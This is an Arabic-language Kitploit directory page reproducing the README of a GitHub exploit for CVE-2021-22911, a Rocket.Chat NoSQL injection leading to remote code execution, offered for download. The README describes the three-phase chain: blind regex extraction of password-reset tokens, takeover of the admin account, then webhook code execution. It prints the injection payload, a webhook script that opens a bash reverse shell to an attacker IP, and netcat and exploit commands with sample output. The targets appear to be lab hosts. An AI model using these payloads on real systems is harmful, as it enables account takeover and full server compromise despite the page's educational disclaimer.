Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
rocketcat-cve-2021-22911-exploit — CVE-2021-22911 Rocket.Chat NoSQL Injection RCE Exploit - لأغراض تعليمية | Kitploit
أدوات/GitHubGitHub/roshanrajbanshi/rocketcat-cve-2021-22911-exploit
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالتعلم والتعليمتطوير الحمولات
GitHubroshanrajbanshi/rocketcat-cve-2021-22911-exploit

rocketcat-cve-2021-22911-exploit

CVE-2021-22911 Rocket.Chat NoSQL Injection RCE Exploit - لأغراض تعليمية

عرض المستودع
5منذ 5 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

Rocket.Chat CVE-2021-22911 Exploit

⚠️ إخلاء مسؤولية - للاستخدام التعليمي فقط

هذا الاستغلال مخصص لأغراض اختبار الاختراق المصرح به والتعليم فقط. الوصول غير المصرح به إلى أنظمة الكمبيوتر غير قانوني. المؤلف غير مسؤول عن أي إساءة استخدام.

📋 نظرة عامة

CVE-2021-22911 هي ثغرة حرجة للحقن في NoSQL بدون مصادقة في Rocket.Chat تؤدي إلى تنفيذ التعليمات البرمجية عن بُعد (RCE).

  • درجة CVSS: 9.8 (حرجة)
  • الإصدارات المتأثرة: Rocket.Chat < 3.12.7
  • متجه الهجوم: الشبكة / بدون مصادقة
  • الأثر: اختراق كامل للنظام

🎯 تفاصيل الثغرة

يستغل هذا الاستغلال ثلاث هجمات حقن NoSQL معًا:

المرحلة 1: إعادة تعيين كلمة مرور مستخدم منخفض الصلاحيات

  • يرسل طلب نسيت كلمة المرور لمستخدم منخفض الصلاحيات
  • يستخدم حقن NoSQL أعمى مع عامل التشغيل $regex لاستخراج رمز إعادة تعيين كلمة المرور حرفًا بحرف
  • يعيد تعيين كلمة المرور إلى قيمة معروفة

المرحلة 2: إعادة تعيين كلمة مرور المسؤول

  • يكرر المرحلة 1 لكن يستهدف حساب المسؤول
  • يستخرج رمز إعادة تعيين كلمة مرور المسؤول عبر حقن NoSQL الأعمى
  • يغير كلمة مرور المسؤول

المرحلة 3: تنفيذ التعليمات البرمجية عن بُعد

  • يتحقق من هوية حساب المسؤول المخترق
  • ينشئ تكامل ويب هوك مع حمولة JavaScript
  • تستخدم الحمولة Node.js child_process.exec() لتشغيل قشرة عكسية
  • يطلق ويب هوك لتنفيذ القشرة العكسية

🛠️ المتطلبات الأساسية

root@kitploit:~
pip install requests

🚀 الاستخدام

1. شغّل مستمع Netcat (الطرفية 1)

root@kitploit:~
nc -lvnp 4444

2. شغّل الاستغلال (الطرفية 2)

إدخال IP يدويًا:

root@kitploit:~
python3 rocket_chat_exploit.py \
  -u [email protected] \
  -a [email protected] \
  -t http://chat.rocket.thm \
  -i 10.9.0.1 \
  -p 4444

اكتشاف IP الخاص بـ tun0 تلقائيًا (موصى به):

root@kitploit:~
python3 rocket_chat_exploit.py \
  -u [email protected] \
  -a [email protected] \
  -t http://chat.rocket.thm \
  -i $(ip a show tun0 | grep "inet " | awk '{print $2}' | cut -d/ -f1) \
  -p 4444

الوسائط:

  • -u: البريد الإلكتروني لمستخدم منخفض الصلاحيات (يجب أن يكون موجودًا)
  • -a: البريد الإلكتروني للمسؤول
  • -t: عنوان URL الهدف (مثيل Rocket.Chat)
  • -i: IP المهاجم الخاص بك (tun0)
  • -p: منفذ مستمع Netcat

مثال على المخرجات

root@kitploit:~
============================================================
  Rocket.Chat CVE-2021-22911 — RCE
  Target : http://chat.rocket.thm
  Shell  : 10.9.0.1:4444
============================================================

[PHASE 1] Low-priv user → [email protected]
[+] Password reset email sent → [email protected]
[*] Extracting reset token via blind NoSQL injection...
    [43/43] aBcDeFgHiJkLmNoPqRsTuVwXyZ1234567890abcd
[+] Token: aBcDeFgHiJkLmNoPqRsTuVwXyZ1234567890abcd
[+] Password changed to: P@$$w0rd!1234

[PHASE 2] Admin user → [email protected]
[+] Password reset email sent → [email protected]
[*] Extracting reset token via blind NoSQL injection...
    [43/43] XyZ9876543210aBcDeFgHiJkLmNoPqRsTuVwXyZ
[+] Token: XyZ9876543210aBcDeFgHiJkLmNoPqRsTuVwXyZ
[+] Password changed to: P@$$w0rd!1234

[PHASE 3] RCE
[!] Start your listener now:  nc -lvnp 4444
[*] Press Enter when nc is ready...
[+] Authenticated as [email protected]
    userid : userid123456789
    token  : token123456...
[+] Webhook created
    http://chat.rocket.thm/hooks/hookid123/token456
[*] Triggering reverse shell...
[+] Trigger sent — check your nc listener

🔍 التفاصيل التقنية

تنسيق حمولة حقن NoSQL

root@kitploit:~
{
  "message": {
    "msg": "method",
    "method": "getPasswordPolicy",
    "params": [
      {
        "token": {
          "$regex": "^abc"
        }
      }
    ]
  }
}

حمولة RCE (سكريبت Webhook)

root@kitploit:~
class Script {
  process_incoming_request({ request }) {
    const require = console.log.constructor('return process.mainModule.require')();
    const { exec } = require('child_process');
    exec('bash -c "bash -i >& /dev/tcp/ATTACKER_IP/PORT 0>&1"');
  }
}

📚 المراجع

  • الاستغلال الأصلي: enox - Exploit-DB 50078, 50108
  • تحليل الثغرة: مدونة SonarSource
  • تفاصيل CVE: CVE-2021-22911

📝 الاعتمادات

  • enox - تطوير الاستغلال الأصلي
  • SonarSource - البحث والتحليل في الثغرة

⚖️ إشعار قانوني

هذه الأداة مقدمّة للأغراض التعليمية واختبار الأمان المصرح به فقط. الوصول غير المصرح به إلى أنظمة الكمبيوتر جريمة جنائية بموجب قانون الاحتيال وإساءة استخدام الكمبيوتر (CFAA) والقوانين الدولية المماثلة.


استخدمها بمسؤولية. اختبر فقط الأنظمة التي تملكها أو لديك إذن كتابي صريح لاختبارها.

تنزيل الأداة